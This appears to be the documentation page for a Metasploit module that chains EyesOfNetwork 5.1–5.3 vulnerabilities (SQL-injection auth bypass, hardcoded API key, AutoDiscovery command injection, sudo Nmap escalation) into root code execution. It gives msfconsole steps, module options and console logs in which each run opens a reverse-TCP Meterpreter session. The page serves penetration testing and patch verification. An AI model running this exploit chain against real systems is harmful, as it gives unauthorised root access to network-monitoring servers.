Spencer McIntyre
6.3 KiB
Vulnerable Application
This module exploits multiple vulnerabilities in EyesOfNetwork version 5.1, 5.2 and 5.3 in order to execute arbitrary commands as root.
The module first runs a few checks to verify the EyesOfNetwork version. If version 5.1 or 5.2 is detected, it attempts
an authentication bypass via an SQL injection in the user_id field in a cookie (CVE-2020-9465). If version 5.3 is
detected, the module exploits a hardcoded admin API key in EyesOfNetwork API version 2.4.2 (CVE-2020-8657) in order to
generate a valid access token and uses it to create a new user with admin privileges. If the generated key is not valid,
the admin API key is obtained via an SQL injection vulnerability affecting the same API version (CVE-2020-8656). If this
doesn't work either, it attempts CVE-2020-9465, which is the slowest and most noisy exploit of the three.
For all vulnerable versions, the next step after bypassing authentication is to abuse a command injection vulnerability
in the target parameter of the AutoDiscovery functionality within the EON web interface (CVE-2020-8654). Specifically,
the module writes an Nmap NSE script containing the payload to disk, and then activates this script by launching an Nmap
host discovery scan against the target. This achieves privilege escalation because the default sudo configuration
permits the 'apache' user to execute Nmap as root (CVE-2020-8655).
The module only works with HTTPS, so SSL is enabled by default. Valid credentials for a user with administrative privileges are required. However, as explained above, the module can bypass authentication via various methods, depending on the EON version. This module has been successfully tested on EyesOfNetwork 5.1, 5.2 and 5.3.
Verification Steps
- Install the module as usual
- Start msfconsole
- Do:
use exploit/linux/http/eyesofnetwork_autodiscovery_rce - Do:
set RHOSTS [IP] - Do:
set payload [payload] - Do:
set LHOST [IP] - Do:
exploit
Options
SERVER_ADDR
This option should be set for EON version 5.3 in case the EyesOfNetwork server IP address is different from RHOST.
This because the EON server IP is needed to generate the API key.
SQLI_SLEEP
The sleep value to be used when attempting to exploit CVE-2020-9465, which uses sleep-based SQL injection. The default value is 1.
Scenarios
- EyesOfNetwork version 5.1
msf5 exploit(linux/http/eyesofnetwork_autodiscovery_rce) > show options
Module options (exploit/linux/http/eyesofnetwork_autodiscovery_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.1.1 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 443 yes The target port (TCP)
SERVER_ADDR yes EyesOfNetwork server IP address (if different from RHOST)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL true no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI / yes Base path to EyesOfNetwork
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
Payload options (linux/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.1.2 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
1 Linux (x64)
msf5 exploit(linux/http/eyesofnetwork_autodiscovery_rce) > exploit
[*] Started reverse TCP handler on 192.168.1.2:4444
[*] Target is EyesOfNetwork version 5.1. Attempting exploitation using CVE-2020-9465.
[+] The target seems vulnerable.
[*] Verified that the admin user has at least one active session.
[*] Found the admin 'session_id' size: 31
[*] Calculating the admin 'session_id' value. This will take a while...
[+] Obtained admin 'session_id' value: 1856115646
[*] Command Stager progress - 100.00% done (897/897 bytes)
[*] Sending stage (3012516 bytes) to 192.168.1.1
[*] Meterpreter session 1 opened (192.168.91.2:4444 -> 192.168.1.1:55744) at 2020-05-19 08:48:37 -0400
- EyesOfNetwork version 5.2
msf5 exploit(linux/http/eyesofnetwork_autodiscovery_rce) > exploit
[*] Started reverse TCP handler on 192.168.1.2:4444
[*] Target is EyesOfNetwork version 5.2. Attempting exploitation using CVE-2020-9465.
[+] The target seems vulnerable.
[*] Verified that the admin user has at least one active session.
[*] Found the admin 'session_id' size: 31
[*] Calculating the admin 'session_id' value. This will take a while...
[+] Obtained admin 'session_id' value: 1445224287
[*] Command Stager progress - 100.00% done (897/897 bytes)
[*] Sending stage (3012516 bytes) to 192.168.1.3
[*] Meterpreter session 2 opened (192.168.1.2:4444 -> 192.168.1.3:38070) at 2020-05-19 08:49:46 -0400
- EyesOfNetwork version 5.3
msf5 exploit(linux/http/eyesofnetwork_autodiscovery_rce) > exploit
[*] Started reverse TCP handler on 192.168.1.2:4444
[*] Target is EyesOfNetwork version 5.3 or later. Attempting exploitation using CVE-2020-8657 or CVE-2020-8656.
[*] Using generated API key: a926605f4e617fd68bbb86112156b41ea2406503859dad58b0d0aefcc848b755
[+] Authenticated as user r6veXwtZ2zh
[*] Command Stager progress - 100.00% done (897/897 bytes)
[*] Sending stage (3012516 bytes) to 192.168.1.4
[*] Meterpreter session 3 opened (192.168.1.2:4444 -> 192.168.1.4:60244) at 2020-05-19 08:50:04 -0400